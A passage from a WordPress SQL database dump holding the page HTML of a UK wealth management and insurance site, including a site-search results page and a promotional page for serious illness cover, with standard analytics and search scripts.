about','publish','closed','closed','','retirement-income-the-final-frontier','','','2017-09-21 16:34:39','2017-09-21 16:34:39','',0,'http://www.equalitywalk.org.uk/retirement-income-the-final-frontier',0,'page','',0),(101,1,'2017-09-21 16:34:39','2017-09-21 16:34:39','<body bgcolor=\"#ffffff\" onload=\"MM_preloadImages(\'images/investments_r4_c1_f2.jpg\',\'images/investments_r4_c6_f2.jpg\',\'images/investments_r4_c9_f2.jpg\',\'images/investments_r4_c11_f2.jpg\',\'images/investments_r4_c12_f2.jpg\',\'images/investments_r4_c15_f2.jpg\',\'images/investments_r4_c16_f2.jpg\')\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div style=\"position:absolute; top:0px; left:50%; margin-left:-475px\">&#13;\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"950\"><tr><td><img src=\"../images/spacer.gif\" width=\"10\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"18\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"14\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"49\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"78\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"16\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"30\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"44\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"118\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"11\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"138\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"129\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"19\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" class=\"header\" style=\"background-image:url(../images/index_r1_c1.jpg); background-repeat:no-repeat\"><a href=\"../wealth-management-faqs/\">wealth management FAQs</a> -  <a href=\"../wealth-management-glossary/\">glossary of wealth management terms</a> - <a href=\"../additional/financial-calendar/\">financial calendar</a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"38\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"27\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"9\"><a href=\"/\"><img name=\"investments_r3_c1\" src=\"../images/investments_r3_c1.jpg\" width=\"353\" height=\"96\" border=\"0\" id=\"investments_r3_c1\" alt=\"Wealth Management - Financial Advice and Information\" /></a></td>&#13;\n   <td colspan=\"8\" valign=\"top\"><div style=\"font-size:19px; text-align:right; margin-right:30px\">Offices throughout the UK,<br />&#13;\n     call us for expert financial advice - &#13;\n     <span style=\"color:#600\"></span>&#13;\n     <script type=\"text/javascript\" src=\"../jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n  google.load(\'search\', \'1\');\r\n  google.setOnLoadCallback(function() {\r\n    google.search.CustomSearchControl.attachAutoCompletion(\r\n      \'011057125409238421392:utfk3c-gm7e\',\r\n      document.getElementById(\'q\'),\r\n      \'cse-search-box\');\r\n  });\r\n]]></script><form action=\"../search-results/\" id=\"cse-search-box\">&#13;\n  <div>&#13;\n    <input type=\"hidden\" name=\"cx\" value=\"011057125409238421392:utfk3c-gm7e\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:9\" /><input type=\"hidden\" name=\"ie\" value=\"UTF-8\" /><input type=\"text\" name=\"q\" id=\"q\" autocomplete=\"on\" size=\"21\" /><input type=\"submit\" name=\"sa\" value=\"Search our Site\" /></div>&#13;\n&#13;\n<script type=\"text/javascript\" src=\"../cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script></form></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"96\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"5\"><a href=\"/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c1\',\'\',\'images/investments_r4_c1_f2.jpg\',1)\"><img name=\"investments_r4_c1\" src=\"../images/investments_r4_c1.jpg\" width=\"120\" height=\"50\" border=\"0\" id=\"investments_r4_c1\" alt=\"Home Page\" /></a></td>&#13;\n    <td colspan=\"3\"><a href=\"../pension/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c6\',\'\',\'images/investments_r4_c6_f2.jpg\',1)\"><img name=\"investments_r4_c6\" src=\"../images/investments_r4_c6.jpg\" width=\"124\" height=\"50\" border=\"0\" id=\"investments_r4_c6\" alt=\"Pension Advice\" /></a></td>&#13;\n    <td colspan=\"2\"><a href=\"..\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c9\',\'\',\'images/investments_r4_c9_f2.jpg\',1)\"><img name=\"investments_r4_c9\" src=\"../images/investments_r4_c9.jpg\" width=\"153\" height=\"50\" border=\"0\" id=\"investments_r4_c9\" alt=\"Savings &amp; Investments\" /></a></td>&#13;\n    <td><a href=\"../trusts-protection/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c11\',\'\',\'images/investments_r4_c11_f2.jpg\',1)\"><img name=\"investments_r4_c11\" src=\"../images/investments_r4_c11.jpg\" width=\"109\" height=\"50\" border=\"0\" id=\"investments_r4_c11\" alt=\"Trusts and Bonds\" /></a></td> <td colspan=\"3\"><a href=\"../wealth-platform/\" onmouseout=\"MM_swapImgRestore()\" onmouseover=\"MM_swapImage(\'index_r4_c11\',\'\',\'images/index_r4_c11_f2.jpg\',1)\"><img name=\"index_r4_c11\" src=\"../images/index_r4_c11.jpg\" width=\"158\" height=\"50\" border=\"0\" id=\"index_r4_c11\" alt=\"Wealth Management\" /></a></td>&#13;\n    <td><a href=\"../about-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c15\',\'\',\'images/investments_r4_c15_f2.jpg\',1)\"><img name=\"investments_r4_c15\" src=\"../images/investments_r4_c15.jpg\" width=\"138\" height=\"50\" border=\"0\" id=\"investments_r4_c15\" alt=\"About US\" /></a></td>&#13;\n    <td colspan=\"2\"><a href=\"javascript:;\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c16\',\'\',\'images/investments_r4_c16_f2.jpg\',1)\"><img name=\"investments_r4_c16\" src=\"../images/investments_r4_c16.jpg\" width=\"148\" height=\"50\" border=\"0\" id=\"investments_r4_c16\" alt=\"\" /></a></td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"50\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n    <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"8\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"2\"><img name=\"investments_r15_c1\" src=\"../images/investments_r15_c1.jpg\" width=\"10\" height=\"245\" border=\"0\" id=\"investments_r15_c1\" alt=\"\" /></td>&#13;\n   <td colspan=\"11\"><div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; search results </div>&#13;\n   <h1>Your Search Results</h1></td>&#13;\n   <td> </td>&#13;\n   <td colspan=\"3\"> </td>&#13;\n   <td rowspan=\"2\"><img name=\"investments_r15_c17\" src=\"../images/investments_r15_c17.jpg\" width=\"19\" height=\"245\" border=\"0\" id=\"investments_r15_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"54\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td> </td>&#13;\n   <td colspan=\"14\" valign=\"top\"><div class=\"paracontent2\">&#13;\n     <div id=\"cse-search-results\"></div>&#13;\n     <script type=\"text/javascript\"><![CDATA[\r\n  var googleSearchIframeName = \"cse-search-results\";\r\n  var googleSearchFormName = \"cse-search-box\";\r\n  var googleSearchFrameWidth = 700;\r\n  var googleSearchDomain = \"www.google.com\";\r\n  var googleSearchPath = \"/cse\";\r\n]]></script><script type=\"text/javascript\" src=\"../afsonline/show_afs_search.js\"></script></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"191\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"><img name=\"investments_r17_c1\" src=\"../images/investments_r17_c1.jpg\" width=\"950\" height=\"6\" border=\"0\" id=\"investments_r17_c1\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"6\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" style=\"background-image:url(../images/index_r16_c1.jpg); background-repeat:no-repeat; color:#333;\"><div class=\"footerlinks\"><a href=\"../site-map/\">sitemap</a> - <a href=\"../privacy-policy/\">privacy policy</a></div><div class=\"footertext\"><br /></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"75\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr></table></div>&#13;\n<script type=\"text/javascript\"><![CDATA[\r\nvar gaJsHost = ((\"https:\" == document.location.protocol) ? \"https://ssl.\" : \"http://www.\");\r\ndocument.write(unescape(\"%3Cscript src=\'\" + gaJsHost + \"google-analytics.com/ga.js\' type=\'text/javascript\'%3E%3C/script%3E\"));\r\n]]></script><script type=\"text/javascript\"><![CDATA[\r\ntry {\r\nvar pageTracker = _gat._getTracker(\"UA-10958181-3\");\r\npageTracker._trackPageview();\r\n} catch(err) {}]]></script><script type=\"text/javascript\"><![CDATA[\r\n   var adiInit =\"488\";\r\n   (function() {\r\n      var adiSrc = document.createElement(\"script\"); adiSrc.type = \"text/javascript\";\r\n      adiSrc.async = true;\r\n      adiSrc.src = (\"https:\" == document.location.protocol ? \"https://\" : \"http://\") + \"static.adinsight.eu/static/scripts/adiTrack.min.js\";\r\n      var s = document.getElementsByTagName(\"script\")[0];\r\n      s.parentNode.insertBefore(adiSrc, s);\r\n   })();\r\n]]></script></body>','Website Search Results - Learn more about Wealth Management','For expert wealth management advice, call us today on 01272 225114 and speak with one of our pension specialists.','publish','closed','closed','','website-search-results-learn-more-about-wealth-management','','','2017-09-21 16:34:39','2017-09-21 16:34:39','',0,'http://www.equalitywalk.org.uk/website-search-results-learn-more-about-wealth-management',0,'page','',0),(102,1,'2017-09-21 16:34:39','2017-09-21 16:34:39','<body class=\"page page-id-3551 page-template page-template-100-width-php light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul id=\"nav\" class=\"menu\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27\"><a href=\"../pensions/\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\">Pension Transfer</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\">Auto Enrolment Report</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pension-review/\">Pension Review</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"../pensions/stakeholder-pensions/\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"../pensions/occupational-pensions/\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\">Income Drawdown</a></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852\"><a>More Information</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\">Lost Pension</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47\"><a href=\"..\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"..isas/\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"..lump-sum-investment/\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"..offshore-bonds/\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"..unit-trusts-oeics/\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46\"><a href=\"../\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"../asset-protection-trust/\">Asset Protection Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"../discretionary-\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"../absolute-\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"../gift-loan-schemes/\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"../wills-and-trust/\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-3381\"><a href=\"../insurance-protection/\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"../critical-illness-insurance-2-0/\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-3551 current_page_item menu-item-3585\"><a href=\"../serious-illness-cover/\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"../relevant-life-plan/\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"../life-insurance/\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"../business-protection-insurance/\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n		</ul></nav></div>&#13;\n	</header></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n																<div id=\"main\" class=\"width-100\" style=\"overflow:hidden !important;padding-left:0px;padding-right:0px;\">&#13;\n		<div class=\"avada-row\" style=\"max-width:100%;\">&#13;\n				<div id=\"content\" class=\"full-width\">&#13;\n				<div id=\"post-3551\" class=\"post-3551 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Serious Illness Insurance</span>&#13;\n			<span class=\"updated\" style=\"display: none;\"/>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/\" title=\"Posts by Paul Bassi\" rel=\"author\">Sam Bassi</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"fullwidth-box\" style=\"background-color:;background-image:url(http://www.equalitywalk.org.uk/wp-content/uploads/2013/04/cover.original.jpg);background-repeat:no-repeat;background-position:top left;background-attachment:fixed;border-top:0px solid ;border-bottom:0px solid ;padding-top:0px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"one_half\"><div class=\"demo-sep sep-none\" style=\"margin-top:30px;\"/>&#13;\n<div id=\"lp-pom-text-12\">&#13;\n<h1><span style=\"color: #ffffff;\"><big>The Speed of Change is All Around Us!</big></span></h1>&#13;\n</div>&#13;\n<div id=\"lp-pom-text-21\">&#13;\n<p><span style=\"color: #ffffff;\"><big>Introducing a revolutionary new generation of insurance that gives you improved cover, annual cash back, upfront premium discounts and a whole lot more!</big></span></p>&#13;\n<a class=\"button large green\" href=\"../contact-us/\" target=\"_blank\">Click To Learn More</a>&#13;\n<div class=\"demo-sep sep-none\" style=\"margin-top:90px;\"/>&#13;\n</div>&#13;\n<p/></div><div class=\"one_half last\"/><div class=\"clearboth\"/>&#13;\n<div class=\"one_third\">&#13;\n<h2/>&#13;\n<h2><span style=\"color: #afd9a5;\"><big>Advanced Cover</big></span></h2>&#13;\n<p><span style=\"color: #000000;\"><span style=\"color: #c0c0c0;\"><span style=\"color: #ffffff;\">COVER FOR ALL HEART ATTACKS AND STROKES, ALSO GET COVERED FOR MORE CANCERS THAN ANY OTHER INSURER</span>.</span></span></p></div><div class=\"one_third\">&#13;\n<h2><span style=\"color: #afd9a5;\"><big>Cover Booster</big></span></h2>&#13;\n<p><span style=\"color: #000000;\"><span style=\"color: #c0c0c0;\"><span style=\"color: #ffffff;\">IF THE ILLNESS HAS A BIGGER IMPACT ON YOU FINANCIALLY,  A UNIQUE BOOSTER INCREASES THE PAY-OUT BY UP TO 200% TO COMPENSATE</span>.</span></span></p></div><div class=\"one_third last\">&#13;\n<h2><span style=\"color: #afd9a5;\"><big>Annual Cashback</big></span></h2>&#13;\n<p><span style=\"color: #000000;\"><span style=\"color: #c0c0c0;\"><span style=\"color: #ffffff;\">ANNUAL CASH BACK OF £50 – £200 AVAILABLE . THE FIRST TIME THIS HAS BEEN OFFERED ON A LIFE POLICY</span>.</span> </span></p>&#13;\n<p/></div><div class=\"clearboth\"/></div></div><div class=\"fullwidth-box\" style=\"background-color:#262626;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><big><big>Award Winning Cover Getting Wide Recognition</big></big></span></p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"/></li><li><a href=\"\" target=\"\"/></li><li><a href=\"\" target=\"\"/></li><li><a href=\"\" target=\"\"/></li><li><a href=\"\" target=\"\"/></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div>&#13;\n<div class=\"fullwidth-box\" style=\"background-color:#353535;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:1px solid ;border-bottom:1px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-1.imageframe{float:centre;}\r\n	#imageframe-1.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-1.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-1.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-1\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Cover a Broader Range of Illnesses</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">166 in fact. Even get payout on the diagnosis of early stage cancers on all parts of the body that other insurers won’t pay out  as they require surgery or invasive treatment.</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div></span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-2.imageframe{float:centre;}\r\n	#imageframe-2.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-2.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-2.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-2\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Boost Your Cover Even Higher</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">100% payout on all conditions that a critical illness plan covers but with an added boost of up to 200% on conditions that have a long term physical impact</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div></span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><div class=\"one_third last\">&#13;\n<p style=\"text-align: center;\"><style type=\"text/css\"><![CDATA[\r\n	#imageframe-3.imageframe{float:centre;}\r\n	#imageframe-3.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-3.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-3.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-3\" class=\"imageframe imageframe-bottomshadow\"><a href=\"#\"/><span class=\"imageframe-shadow-left\"/><span class=\"imageframe-shadow-right\"/></span>&#13;\n</p><p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">Upfront Premium Discounts</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\">You can pay lower premioums in your first year between 5% and 40% subject to your plan term, they can stay low or reduce further if you look after your health</span></p>&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"/></p></div><div class=\"clearboth\"/></span></p></div></div><div class=\"fullwidth-box\" style=\"background-color:#191919;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<p style=\"text-align: center;\"><span style=\"color: #c0c0c0;\"><big><big><big>Isn’t it time for your protection to evolve to enhanced serious illness cover?</big></big></big></span></p>&#13;\n<p style=\"text-align: center;\"/></div></div>&#13;\n<div 